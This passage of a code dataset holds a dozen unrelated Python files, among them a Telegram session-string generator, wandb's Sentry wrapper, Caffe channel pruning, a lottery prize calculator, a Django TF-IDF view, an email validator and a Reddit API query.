Anyone__\\n• __Dont Invite Anyone To Heroku__\",\n )\n except Exception as e:\n print(f\"{e}\")\n elif library == \"2\":\n print(\"Welcome To Pyrogram String Session\")\n APP_ID = int(input(\"\\nEnter Ur APP ID ~: \"))\n API_HASH = input(\"\\nEnter Ur API_HASH ~: \")\n try:\n with Client(\":memory:\", api_id=APP_ID, api_hash=API_HASH) as boy:\n sweetie = boy.export_session_string()\n print(\n \"Successfully Pyrogram String Session Has Been Generated \\nCheck Ur Saved Message \\nIf U Terminate Sessions Then U Have To Generate Gain\\nDont Try To Share STRING SESSION with Anyone\"\n )\n boy.send_message(\"me\", f\"Pyrogram String Session\\n\\n`{sweetie}`\")\n except Exception as e:\n print(f\"{e}\")\n else:\n print(\n \"\\nohh sorry Ab Fir Se Start karo & \\nChoose 1 For Userbot \\nChoose 2 For Pyrogram \\n Pahle Run karo fir se Tab 1 ya 2 Koi Ek Select Karna\"\n )\n","repo_name":"akshitbhatia2004/USERBOT-BY-AKSHIT","sub_path":"AkshitString.py","file_name":"AkshitString.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"8395832611","text":"__all__ = (\"Sentry\",)\n\n\nimport atexit\nimport functools\nimport os\nimport pathlib\nimport sys\nfrom types import TracebackType\nfrom typing import TYPE_CHECKING, Any, Callable, Dict, Optional, Tuple, Type, Union\nfrom urllib.parse import quote\n\nif sys.version_info >= (3, 8):\n from typing import Literal\nelse:\n from typing_extensions import Literal\n\nimport sentry_sdk # type: ignore\nimport sentry_sdk.utils # type: ignore\n\nimport wandb\nimport wandb.env\nimport wandb.util\n\nif TYPE_CHECKING:\n import wandb.sdk.internal.settings_static\n\nSENTRY_DEFAULT_DSN = (\n \"https://2592b1968ea94cca9b5ef5e348e094a7@o151352.ingest.sentry.io/4504800232407040\"\n)\n\nSessionStatus = Literal[\"ok\", \"exited\", \"crashed\", \"abnormal\"]\n\n\ndef _safe_noop(func: Callable) -> Callable:\n \"\"\"Decorator to ensure that Sentry methods do nothing if disabled and don't raise.\"\"\"\n\n @functools.wraps(func)\n def wrapper(self: Type[\"Sentry\"], *args: Any, **kwargs: Any) -> Any:\n if self._disabled:\n return None\n try:\n return func(self, *args, **kwargs)\n except Exception as e:\n # do not call self.exception here to avoid infinite recursion\n if func.__name__ != \"exception\":\n self.exception(f\"Error in {func.__name__}: {e}\")\n return None\n\n return wrapper\n\n\nclass Sentry:\n _disabled: bool\n\n def __init__(self) -> None:\n self._disabled = not wandb.env.error_reporting_enabled()\n self._sent_messages: set = set()\n\n self.dsn = os.environ.get(wandb.env.SENTRY_DSN, SENTRY_DEFAULT_DSN)\n\n self.hub: Optional[sentry_sdk.hub.Hub] = None\n\n # ensure we always end the Sentry session\n atexit.register(self.end_session)\n\n @property\n def environment(self) -> str:\n \"\"\"Return the environment we're running in.\"\"\"\n # check if we're in a git repo\n is_git = pathlib.Path(__file__).parent.parent.parent.joinpath(\".git\").exists()\n\n # these match the environments for gorilla\n return \"development\" if is_git else \"production\"\n\n @_safe_noop\n def setup(self) -> None:\n \"\"\"Setup Sentry SDK.\n\n We use lower-level APIs (i.e., not sentry_sdk.init) here\n to avoid the possibility of interfering with the user's\n own Sentry SDK setup.\n \"\"\"\n client = sentry_sdk.Client(\n dsn=self.dsn,\n default_integrations=False,\n environment=self.environment,\n release=wandb.__version__,\n )\n self.hub = sentry_sdk.Hub(client)\n\n @_safe_noop\n def message(self, message: str, repeat: bool = True) -> None:\n \"\"\"Send a message to Sentry.\"\"\"\n if not repeat and message in self._sent_messages:\n return\n self._sent_messages.add(message)\n self.hub.capture_message(message) # type: ignore\n\n @_safe_noop\n def exception(\n self,\n exc: Union[\n str,\n BaseException,\n Tuple[\n Optional[Type[BaseException]],\n Optional[BaseException],\n Optional[TracebackType],\n ],\n None,\n ],\n handled: bool = False,\n status: Optional[\"SessionStatus\"] = None,\n ) -> None:\n \"\"\"Log an exception to Sentry.\"\"\"\n error = Exception(exc) if isinstance(exc, str) else exc\n # based on self.hub.capture_exception(_exc)\n if error is not None:\n exc_info = sentry_sdk.utils.exc_info_from_error(error)\n else:\n exc_info = sys.exc_info()\n\n event, hint = sentry_sdk.utils.event_from_exception(\n exc_info,\n client_options=self.hub.client.options, # type: ignore\n mechanism={\"type\": \"generic\", \"handled\": handled},\n )\n try:\n self.hub.capture_event(event, hint=hint) # type: ignore\n except Exception:\n pass\n\n # if the status is not explicitly set, we'll set it to \"crashed\" 
if the exception\n # was unhandled, or \"errored\" if it was handled\n status = status or (\"crashed\" if not handled else \"errored\") # type: ignore\n self.mark_session(status=status)\n\n client, _ = self.hub._stack[-1]\n client.flush()\n\n return None\n\n def reraise(self, exc: Any) -> None:\n \"\"\"Re-raise an exception after logging it to Sentry.\n\n Use this for top-level exceptions when you want the user to see the traceback.\n\n Must be called from within an exception handler.\n \"\"\"\n self.exception(exc)\n # this will messily add this \"reraise\" function to the stack trace,\n # but hopefully it's not too bad\n raise exc.with_traceback(sys.exc_info()[2])\n\n @_safe_noop\n def start_session(self) -> None:\n \"\"\"Start a new session.\"\"\"\n assert self.hub is not None\n # get the current client and scope\n _, scope = self.hub._stack[-1]\n session = scope._session\n\n # if there's no session, start one\n if session is None:\n self.hub.start_session()\n\n @_safe_noop\n def end_session(self) -> None:\n \"\"\"End the current session.\"\"\"\n assert self.hub is not None\n # get the current client and scope\n client, scope = self.hub._stack[-1]\n session = scope._session\n\n if session is not None and client is not None:\n self.hub.end_session()\n client.flush()\n\n @_safe_noop\n def mark_session(self, status: Optional[\"SessionStatus\"] = None) -> None:\n \"\"\"Mark the current session with a status.\"\"\"\n assert self.hub is not None\n _, scope = self.hub._stack[-1]\n session = scope._session\n\n if session is not None:\n session.update(status=status)\n\n @_safe_noop\n def configure_scope(\n self,\n tags: Optional[Dict[str, Any]] = None,\n process_context: Optional[str] = None,\n ) -> None:\n \"\"\"Configure the Sentry scope for the current thread.\n\n This function should be called at the beginning of every thread that\n will send events to Sentry. It sets the tags that will be applied to\n all events sent from this thread. 
It also tries to start a session\n if one doesn't already exist for this thread.\n \"\"\"\n assert self.hub is not None\n settings_tags = (\n \"entity\",\n \"project\",\n \"run_id\",\n \"run_url\",\n \"sweep_url\",\n \"sweep_id\",\n \"deployment\",\n \"_disable_service\",\n \"_require_nexus\",\n \"launch\",\n )\n\n with self.hub.configure_scope() as scope:\n scope.set_tag(\"platform\", wandb.util.get_platform_name())\n\n # set context\n if process_context:\n scope.set_tag(\"process_context\", process_context)\n\n # apply settings tags\n if tags is None:\n return None\n\n for tag in settings_tags:\n val = tags.get(tag, None)\n if val not in (None, \"\"):\n scope.set_tag(tag, val)\n\n if tags.get(\"_colab\", None):\n python_runtime = \"colab\"\n elif tags.get(\"_jupyter\", None):\n python_runtime = \"jupyter\"\n elif tags.get(\"_ipython\", None):\n python_runtime = \"ipython\"\n else:\n python_runtime = \"python\"\n scope.set_tag(\"python_runtime\", python_runtime)\n\n # Construct run_url and sweep_url given run_id and sweep_id\n for obj in (\"run\", \"sweep\"):\n obj_id, obj_url = f\"{obj}_id\", f\"{obj}_url\"\n if tags.get(obj_url, None):\n continue\n\n try:\n app_url = wandb.util.app_url(tags[\"base_url\"]) # type: ignore\n entity, project = (quote(tags[k]) for k in (\"entity\", \"project\")) # type: ignore\n scope.set_tag(\n obj_url,\n f\"{app_url}/{entity}/{project}/{obj}s/{tags[obj_id]}\",\n )\n except Exception:\n pass\n\n email = tags.get(\"email\")\n if email:\n scope.user = {\"email\": email} # noqa\n\n # todo: add back the option to pass general tags see: c645f625d1c1a3db4a6b0e2aa8e924fee101904c (wandb/util.py)\n\n self.start_session()\n","repo_name":"wandb/wandb","sub_path":"wandb/analytics/sentry.py","file_name":"sentry.py","file_ext":"py","file_size_in_byte":8440,"program_lang":"python","lang":"en","doc_type":"code","stars":7479,"dataset":"github-code","pt":"37"}
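A minimal usage sketch for the `Sentry` wrapper above; the singleton name and the `risky_operation` call are illustrative assumptions, not part of the wandb source:

_sentry = Sentry()
_sentry.setup()  # builds a private Hub/Client so any user-level sentry_sdk.init() is left alone
_sentry.configure_scope(process_context="internal")  # tag events sent from this thread
try:
    risky_operation()  # hypothetical wandb-internal call
except Exception as e:
    _sentry.exception(e, handled=True)  # logged, session marked, execution continues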
+{"seq_id":"38791436408","text":"from flask_sqlalchemy import SQLAlchemy\nimport datetime\n\ndb = SQLAlchemy()\n\ndef convert_time(time):\n if not time:\n return None\n return time.strftime('%m-%d-%Y %H:%M:%S')\n\nclass User(db.Model):\n __tablename__ = 'user'\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(64), nullable=False, unique=True)\n wins = db.relationship('Game', foreign_keys='Game.winner_user_id')\n losses = db.relationship('Game', foreign_keys='Game.loser_user_id')\n\n def __init__(self, name):\n self.name = name\n\n def to_dict(self):\n return {\n 'id': self.id,\n 'name': self.name\n }\n\n\nclass Game(db.Model):\n __tablename__ = 'game'\n id = db.Column(db.Integer, primary_key=True)\n winner_user_id = db.Column(db.Integer,\n db.ForeignKey('user.id'),\n nullable=False)\n loser_user_id = db.Column(db.Integer,\n db.ForeignKey('user.id'),\n nullable=False)\n start_time = db.Column(db.DateTime)\n end_time = db.Column(db.DateTime, default=datetime.datetime.utcnow())\n\n\n winner_user = db.relationship('User', foreign_keys='Game.winner_user_id')\n losing_user = db.relationship('User', foreign_keys='Game.loser_user_id')\n\n def __init__(self, winning_user=None, losing_user=None,\n winning_user_id=None, loser_user_id=None,\n start_time=None, end_time=None):\n\n if self.winner_user:\n self.winner_user = winning_user\n else:\n self.winner_user_id = winning_user_id\n\n if self.losing_user:\n self.losing_user = losing_user\n else:\n self.loser_user_id = loser_user_id\n\n self.start_time = start_time\n self.end_time = end_time\n\n def to_dict(self, tc=convert_time):\n return {\n 'id': self.id,\n 'start_time': tc(self.start_time),\n 'end_time': tc(self.end_time),\n 'winning_user': self.winner_user.to_dict(),\n 'losing_user': self.losing_user.to_dict()\n }\n","repo_name":"Rastii/BilliardStats","sub_path":"BilliardStats/models/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"73292930346","text":"'''\nCaffe net-surgery for channel pruning based on L1 norm for simple layers without skip connections\nList of layers needs to be specifed mannually\n\nAuthor: Harshal\nCreated on : 10 July 2019\nModified on: 10 July 2019\n'''\n\nimport caffe\nimport numpy as np\nimport cv2\nfrom caffe.proto import caffe_pb2\n\n# input test image path\nimage_path = '' \ndeploy_prototxt = 'deploy.prototxt' \ndeploy_prototxt_modified = 'deploy_pruned.prototxt' \ncaffemodel = '_iter_500000.caffemodel' \n\ntest_net = caffe.Net(deploy_prototxt, caffemodel, caffe.TEST)\ntest_net_pruned = caffe.Net(deploy_prototxt_modified, caffe.TEST)\n\nlayer_names = list(test_net._layer_names)\nlayers_to_prune = ['res2a_branch2a']\nchannel_to_prune = None\nfor (key, value) in test_net.params.items():\n# for key in ['conv1']:\n layer_type = test_net.layers[layer_names.index(key)].type\n print(layer_type)\n if layer_type == 'Convolution' and key in layers_to_prune:\n W = test_net.params[key][0].data\n print(W.shape)\n L1_norm = np.sum(np.abs(W), axis = (1, 2, 3))\n channel_to_prune = np.argmin(L1_norm)\n print('Pruning channel no. {}, norm {}'.format(channel_to_prune, L1_norm[channel_to_prune]))\n\n temp = np.zeros(W.shape, np.float32)\n np.copyto(temp, W)\n temp = np.delete(temp, channel_to_prune, axis = 0)\n # temp[channel_to_prune, :, :, :] = 0.0\n np.copyto(test_net_pruned.params[key][0].data, temp)\n\n if len(list(test_net.params[key])) == 2: # check if bias paramter is also there\n b = test_net.params[key][1].data\n print(b.shape)\n temp = np.zeros(b.shape, np.float32)\n np.copyto(temp, b)\n temp = np.delete(temp, channel_to_prune, axis = 0)\n # temp[channel_to_prune, :, :, :] = 0.0\n np.copyto(test_net_pruned.params[key][1].data, temp)\n \n else:\n for i in range(len(list(test_net.params[key]))):\n print(test_net.params[key][i].data.shape)\n if channel_to_prune is not None and (i < 2 or layer_type == 'Scale'):\n temp = np.zeros(test_net.params[key][i].data.shape, np.float32)\n np.copyto(temp, test_net.params[key][i].data)\n if layer_type == 'Convolution' and i == 0:\n temp = np.delete(temp, channel_to_prune, axis = 1)\n channel_to_prune = None\n else:\n temp = np.delete(temp, channel_to_prune, axis = 0)\n else:\n np.copyto(test_net_pruned.params[key][i].data, test_net.params[key][i].data)\n\n\ntest_net_pruned.save('_iter_500000_pruned.caffemodel')\n\n# print(test_net.params['conv1'][0].data.shape)\n# print(test_net.params['conv1'][1].data.shape)\n\n\n#--------------------------------------------------------------------------------------------------------------#\ndata_image_1 = cv2.imread(image_path)\n\n# data_image_1[:, :, 0] = data_image_1[:, : , 0].astype('float') - 193.24\n# data_image_1[:, :, 1] = data_image_1[:, : , 1].astype('float') - 107.298\n# data_image_1[:, :, 2] = data_image_1[:, : , 2].astype('float') - 162.016\n\n# data_image_1[:, :, 0] = data_image_1[:, :, 2]\n# data_image_1[:, :, 1] = data_image_1[:, :, 1]\n# data_image_1[:, :, 2] = data_image_1[:, :, 0]\n\ndata_image = np.transpose(data_image_1, (2, 0, 1))\ndata_image = data_image.reshape((1, 3, 512, 512))\n\ntest_net.blobs['data'].data[...] 
= data_image\ntest_net.forward()\n\n# out_image = test_net.blobs['score'].data\n# out_image = test_net.blobs['deconvFusion_Sem_3'].data\nout_image = test_net.blobs['argmax'].data\nprint(out_image)\n# out_image = out_image.reshape((3, 512, 512))\nout_image = out_image.reshape((512, 512)).astype('uint8')\n\n# out_image = out_image.transpose((1, 2, 0))\nout_image[out_image == 1.0] = 255\n\n# out_image = (out_image - minimum) * 255 / (maximum - minimum)\nprint(out_image)\nprint(data_image.shape)\n\ncv2.imwrite('test_out.png', out_image)\n\ntest_net_pruned.blobs['data'].data[...] = data_image\ntest_net_pruned.forward()\n\n# out_image = test_net.blobs['score'].data\n# out_image = test_net.blobs['deconvFusion_Sem_3'].data\nout_image = test_net_pruned.blobs['argmax'].data\nprint(out_image)\n# out_image = out_image.reshape((3, 512, 512))\nout_image = out_image.reshape((512, 512)).astype('uint8')\n\n# out_image = out_image.transpose((1, 2, 0))\nout_image[out_image == 1.0] = 255\n\n# out_image = (out_image - minimum) * 255 / (maximum - minimum)\nprint(out_image)\nprint(data_image.shape)\n\ncv2.imwrite('test_out_pruned.png', out_image)\n","repo_name":"harshalnishar/caffe_model_pruning","sub_path":"model_pruninig.py","file_name":"model_pruninig.py","file_ext":"py","file_size_in_byte":4508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
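The selection rule in the script above is framework-independent; a minimal NumPy sketch of the same idea, ranking convolution filters by L1 norm and deleting the weakest (shapes are illustrative):

import numpy as np

W = np.random.randn(64, 32, 3, 3)         # (out_channels, in_channels, kH, kW)
l1 = np.abs(W).sum(axis=(1, 2, 3))        # one L1 norm per output filter
weakest = int(np.argmin(l1))
W_pruned = np.delete(W, weakest, axis=0)  # drop that filter -> (63, 32, 3, 3)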
+{"seq_id":"39982910039","text":"import click\nimport numpy as np\nimport pandas as pd\n\n\n###############################\n# calculate distributed prizes\n\nCUTOFF = pd.to_datetime('2016-01-02')\n\n\ndef get_totalprize13(total_revenue, date):\n if date >= CUTOFF:\n return total_revenue * 0.393 * 0.7 * 0.15 / 1.045\n else:\n return total_revenue * 0.400 * 0.7 * 0.15 / 1.045\n\n\ndef get_totalprize14(total_revenue, acc, date):\n if date >= CUTOFF:\n return total_revenue * 0.393 * 0.7 * 0.70 / 1.045 + acc\n else:\n return total_revenue * 0.400 * 0.7 * 0.70 / 1.045 + acc\n\n\ndef get_accumulated05(total_revenue, date):\n if date >= CUTOFF:\n return total_revenue * 0.393 * 0.7 * 0.15 / 1.045\n else:\n return total_revenue * 0.400 * 0.7 * 0.15 / 1.045\n\n\n##################################\n# core\n\ndef calculate_prizes(df):\n \"\"\"This algorithm will calculate the total amount accumulated and the prizes\n for each Loteca round in the dataset.\n\n Columns added:\n acc13/acc14/acc05: the amount of money this round contributes to the\n next ones (the partial amounts accumulated)\n totalacc: the total amount of money accumulated *for* this round\n total13/total14: the total prize that will be paid to the winners in\n this round\n\n Note:\n Some of the data is not possible to retrieve. In these cases, we set a\n value of np.nan\n\n Returns:\n A new DataFrame with the columns added.\n \"\"\"\n df = df.copy()\n\n # algorithm over the rows\n columns = ['acc13', 'acc14', 'acc05', 'total13', 'total14', 'totalacc']\n for column in columns:\n df[column] = np.nan\n\n for i in df.index:\n # last accumulated 14 rights\n try:\n lastacc13 = df.loc[i - 1, 'acc13']\n except KeyError:\n lastacc13 = np.nan\n\n # last accumulated 13 rights\n try:\n lastacc14 = df.loc[i - 1, 'acc14']\n except KeyError:\n lastacc14 = np.nan\n\n # accumulated for rounds ending in 0 or 5\n if i % 5 == 0:\n values = df.loc[i - 5: i - 1, 'acc05']\n if values.shape[0] == 5:\n lastacc05 = values.sum()\n else:\n lastacc05 = np.nan\n else:\n lastacc05 = 0.0\n\n # total accumulated (for this round)\n totalacc = lastacc13 + lastacc14 + lastacc05\n\n # calculate prizes and stuff\n total_revenue = df.loc[i, 'total_revenue']\n date = df.loc[i, 'date']\n total13 = get_totalprize13(total_revenue, date)\n total14 = get_totalprize14(total_revenue, totalacc, date)\n acc13 = total13 if df.loc[i, 'winners13'] == 0 else 0.0\n acc14 = total14 if df.loc[i, 'winners14'] == 0 else 0.0\n acc05 = get_accumulated05(total_revenue, date)\n\n # assign values\n df.loc[i, 'total13'] = total13\n df.loc[i, 'total14'] = total14\n df.loc[i, 'totalacc'] = totalacc\n df.loc[i, 'acc13'] = acc13\n df.loc[i, 'acc14'] = acc14\n df.loc[i, 'acc05'] = acc05\n\n # only keep rounds where 'totalacc' is present\n df = df[df.totalacc.notnull()]\n\n return df\n\n\ndef process_loteca_rounds(df):\n \"\"\"Process the loteca rounds\n\n 1. Remove rounds without revenue information\n 2. Add bet price information\n 3. Calculate amount of bets per round\n 4. Calculate the total accumulated and total prizes for each round\n 5. 
Remove rounds where we couldn't compute the total prize or value\n accumulated\n \"\"\"\n # work with a copy\n df = df.copy()\n\n # only keep rounds that contain the revenue\n df = df[df.total_revenue.notnull()]\n\n # add the bet price to count the amount of bets made\n df['betprice'] = 0.5\n df.loc[df.date >= pd.to_datetime('2015-05-18'), 'betprice'] = 1.0\n\n # calculate amount of bets\n df['betcnt'] = df.total_revenue / df.betprice\n df['betcnt'] = df.betcnt.apply(int)\n\n # calculate the prizes\n df = calculate_prizes(df)\n df = df.drop(['acc13', 'acc14', 'acc05'], axis=1)\n\n # remove rounds where we couldn't calculate the total prize or accumulated\n df = df[df.total13.notnull() & df.total14.notnull() & df.totalacc.notnull()]\n\n return df\n\n\n##################################\n# CLI\n\n@click.command()\n@click.argument('in-lotecaf-rounds', type=click.Path(exists=True))\n@click.argument('out-lotecaf-rounds', type=click.Path(writable=True))\ndef save_processed_rounds(in_lotecaf_rounds, out_lotecaf_rounds):\n df = pd.read_pickle(in_lotecaf_rounds)\n df = process_loteca_rounds(df)\n df.to_pickle(out_lotecaf_rounds)\n\n\nif __name__ == '__main__':\n save_processed_rounds()\n","repo_name":"lowerthansound/laughing-telegram","sub_path":"src/data/process/loteca_rounds.py","file_name":"loteca_rounds.py","file_ext":"py","file_size_in_byte":4639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
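One subtlety the accumulation in `calculate_prizes` relies on: `.loc` slices by label and is inclusive on both ends, so `df.loc[i - 5 : i - 1, 'acc05']` really covers five rows. A quick illustration with made-up data:

import pandas as pd

s = pd.Series([10, 20, 30, 40, 50, 60])
print(s.loc[0:4].sum())  # 150 -- labels 0..4 inclusive, unlike positional s[0:4]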
+{"seq_id":"29231964507","text":"import time,threading\nblance=0\nlock = threading.Lock()\ndef change_it(n):\n global blance\n blance=blance+n\n blance=blance-n\n\ndef run_thread(n):\n for i in range(2000000):\n lock.acquire()\n try:\n change_it(n)\n finally:\n lock.release()\n\n\nt1=threading.Thread(target=run_thread,args=(5,))\nt2=threading.Thread(target=run_thread,args=(4,))\nt1.start()\nt2.start()\nt1.join()\nt2.join()\nprint('blance:',blance)\n#死循环\n'''import multiprocessing\n\ndef lop():\n x=0\n while True:\n x=x^1\n\nfor i in range(10):\n t=threading.Thread(target=lop)\n t.start()\n'''\n#ThreadLocal\n# python 还提供了 ThreadLocal 变量,它本身是一个全局变量,\n# 但是每个线程却可以利用它来保存属于自己的私有数据,这些私有数据对其他线程也是不可见的\n\n\n\n","repo_name":"guodaxiaa/python_office","sub_path":"多线程-lock.py","file_name":"多线程-lock.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"28657630681","text":"import itertools\nimport math\nimport re\nfrom collections import OrderedDict\n\nfrom django.db.models import F\nfrom django.shortcuts import render\n\nfrom .models import Word_in_texts\n\nTOTAL_DOC_KEY = '__count_doc'\n\n\ndef get_updated_quantity(word):\n data, created = Word_in_texts.objects.get_or_create(\n word=word, defaults={'quantity': 0}\n )\n data.quantity = F('quantity') + 1\n data.save(update_fields=['quantity'])\n data.refresh_from_db()\n return data.quantity\n\n\ndef upload(request):\n if request.method == 'POST' and request.FILES['upload']:\n upload = request.FILES['upload'].read().decode('utf-8')\n upload = re.sub(r'[^\\w\\s]', '', upload)\n text = upload.split()\n count = get_updated_quantity(TOTAL_DOC_KEY)\n words = {}\n for word in text:\n if word in words:\n words[word][0] += 1\n else:\n words[word] = [1]\n for k, v in words.items():\n word_in_texts = get_updated_quantity(k)\n idf = round(math.log10(count/word_in_texts), 2)\n words[k].append(idf)\n words = OrderedDict(sorted(words.items(),\n key=lambda kv: kv[1][1], reverse=True))\n words = dict(itertools.islice(words.items(), 50))\n return render(request, 'upload.html', {'words': words})\n return render(request, 'upload.html')\n ","repo_name":"myagkova/words_calculator","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"26365212835","text":"import csv\n\ncounter = 0\n#max_num_sent = 1000000\nmax_num_sent = 500000\n\nall_data_list = list()\nwith open(\"domain_data/all_fewshot.txt\") as f:\n for line in f:\n if line == \"\\n\":\n continue\n if counter < max_num_sent:\n counter+=1\n line = line.strip()\n #print(line)\n all_data_list.append([line])\n else:\n break\n\nprint(\"Domain:\",counter)\n\n#with open(\"openwebtext.txt\") as f:\nwith open(\"retrieve.txt\") as f:\n for line in f:\n if line == \"\\n\":\n continue\n if counter < max_num_sent:\n counter+=1\n line = line.strip()\n all_data_list.append([line])\n else:\n break\nprint(\"All:\",counter)\n\nwith open(\"train.txt\", \"w\") as f:\n writer = csv.writer(f)\n writer.writerows(all_data_list)\n\n","repo_name":"thunlp/CSS-LM","sub_path":"data/openwebtext/combine_domain_and_openweb.py","file_name":"combine_domain_and_openweb.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"37"}
+{"seq_id":"6376446755","text":"\"\"\"\nBMI指数:(BMI是计算而来的,很明显它听起来像一个属性而非方法,如果我们将其作为一个属性,更便于理解)\n成人的BMI数值:\n过轻:低于18.5\n正常:18.5-23.9\n过重:24-27\n肥胖:28-32\n非常肥胖:高于32\n体质指数(BMI)= 体重(KG)/ 身高^2(M)\nEX:70KG / (1.75*1.75) = 22.86\n\"\"\"\n# 一、普通解决方法\n# class People:\n# def __init__(self, name, weight, height):\n# self.name = name\n# self.weight = weight\n# self.height = height\n#\n# p = People('jack', 48, 1.65)\n# p.bmi = p.weight / (p.height ** 2)\n#\n# print(p.bmi)\n\"\"\"\n17.63085399449036\negon\ndragon\n名字必须是字符串类型\ndragon\n不允许删除\n\"\"\"\n\n# 二、添加函数改写\n# class People:\n# def __init__(self, name, weight, height):\n# self.name = name\n# self.weight = weight\n# self.height = height\n#\n# def bmi(self):\n# print('===>')\n# return self.weight / (self.height ** 2)\n#\n# p = People('SH', 53, 1.70)\n# print(p.bmi()) # bmi是一个名词,却使用bmi(),容易误解为一个动作\n\n\n# 三、增加property装饰器\n# class People:\n# def __init__(self, name, weight, height):\n# self.name = name\n# self.weight = weight\n# self.height = height\n#\n# @property # 应用场景:有一个值是通过计算得来的,首选定义方法,运用property让使用者感知不到\n# def bmi(self):\n# print('===>')\n# return self.weight / (self.height ** 2)\n#\n# p = People('SH', 53, 1.70)\n# print(p.bmi) # 使用者像访问数据属性一样访问bmi,方法被伪装\n#\n# p.height = 1.82\n# print(p.bmi)\n#\n# p.bmi = 333 # 报错,看起来像数据属性,其实还是一个方法,不能赋值\n\n\n\"\"\"\nproperty的另一种用法\n\"\"\"\n# class People:\n# def __init__(self, name):\n# self.__name = name\n#\n# def get_name(self):\n# return self.__name\n#\n# p = People('egon')\n# print(p.get_name()) # 输出:egon\n\n\n\n# class People:\n# def __init__(self, name):\n# self.__name = name\n#\n# @property\n# def name(self):\n# return self.__name\n#\n# p = People('egon')\n# print(p.name)\n\n\nclass People:\n def __init__(self, name):\n self.__name = name\n\n @property\n def name(self):\n # print('getter')\n return self.__name\n\n @name.setter\n def name(self, val):\n # print('setter', val)\n if not isinstance(val, str):\n print('名字必须是字符串类型')\n return\n self.__name=val\n\n @name.deleter\n def name(self):\n # print('deleter')\n print('不允许删除')\n\np = People('egon')\nprint(p.name) # 输出:egon\np.name = 'dragon'\nprint(p.name) # 输出:dragon # name修改成功\n\np.name = 123 # 输出:名字必须是字符串类型(报错)\nprint(p.name) # 输出:dragon\n\ndel p.name # 输出:不允许删除(报错)\n","repo_name":"hqs2212586/startMyPython3.0","sub_path":"第五章-面向对象/21 property的使用.py","file_name":"21 property的使用.py","file_ext":"py","file_size_in_byte":2942,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"70887681068","text":"# -*- coding: utf-8 -*-\nlocal_available = set(\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!#$%&'*+-/=?^_`{|}~.\")\ndomain_available = set(\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-.]\")\nspec = set(\"(),:;<>@[\\] \")\n\n\ndef check_local(local):\n \"\"\"\n 1. прописные и строчные латинские буквы от A до Z и от a до z ;\n 2. цифры от 0 до 9 ;\n 3. специальные символы !#$%&'*+-/=?^_`{|}~ ;\n 4. точка . , при условии, что это не первый или последний символ, если он не заключен в кавычки, а также при условии, что он не появляется последовательно, если он не заключен в кавычки\n 5. пробел и символы \"(),:;<>@[\\] разрешены только внутри строки в кавычках\n \"\"\"\n in_commas = False\n if local[0] == \".\" or local[-1] == \".\":\n return False\n for c in local:\n if c == '\\\"':\n in_commas = not in_commas\n continue\n\n if not in_commas:\n if c == \".\":\n if dot:\n return False\n dot = True\n else:\n dot = False\n if not c in local_available or c in spec:\n return False\n else:\n if not c in local_available and not c in spec:\n return False\n return True\n\n\ndef check_domain(domain):\n \"\"\"\n 1. строчные латинские буквы: abcdefghijklmnopqrstuvwxyz ,\n 2. заглавные латинские буквы: ABCDEFGHIJKLMNOPQRSTUVWXYZ ,\n 3. цифры: 0123456789 ,\n 4. дефис: - (не первый и не последний символ),\n 5. точка: . (не первый и не последний символ и не две подряд),\n 6. может содержать строку, заключенную в квадратные скобки\n \"\"\"\n if domain[0] == \"-\" or domain[-1] == \"-\" or domain.count(\".\") == 0:\n return \"no\"\n if domain[0] == \".\" or domain[-1] == \".\":\n return \"no\"\n if domain.count(\"..\") != 0:\n return \"no\"\n if domain.count(\"]\") > 1:\n return \"no\"\n if domain.count(\"[\") != 0:\n if domain[0] != \"[\":\n return \"no\"\n for c in domain:\n if not c in domain_available:\n return \"no\"\n return \"yes\"\n\n\ndef check_email(st):\n # макс. 64@255 символов, всего не более 256\n if st.count(\"@\") == 0 or len(st) > 256:\n return \"no\"\n local = st.split(\"@\")[0]\n domain = st.split(\"@\")[1]\n if len(local) == 0 or len(domain) == 0:\n return \"no\"\n if len(local) > 64 or len(domain) > 255:\n return \"no\"\n\n if check_local(local):\n return check_domain(domain)\n else:\n return \"no\"\n\n\ns = input()\nprint(check_email(s))\n","repo_name":"ChristieMartin/CMC-MSU-prac","sub_path":"5th_sem/python/АНД/hw1/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":3006,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"33753009914","text":"#!/usr/bin/python3\n\"\"\"function that queries the Reddit API and returns the number of\nsubscribers\"\"\"\nimport requests\n\n\ndef number_of_subscribers(subreddit):\n \"\"\"queries the Reddit API\n\n args: subreddit - subreddit name\n\n returns the number of subscribers\n \"\"\"\n\n url = 'https://www.reddit.com/r/{}/about.json'.format(subreddit)\n headers = {\"User-Agent\": \"ChangeMeClient/0.1 by Makaburi_McMaina\"}\n res = requests.get(url, headers=headers, allow_redirects=False)\n\n if res.status_code == 200:\n return(res.json().get('data').get('subscribers'))\n return 0\n","repo_name":"JI-Maina/alx-system_engineering-devops","sub_path":"0x16-api_advanced/0-subs.py","file_name":"0-subs.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
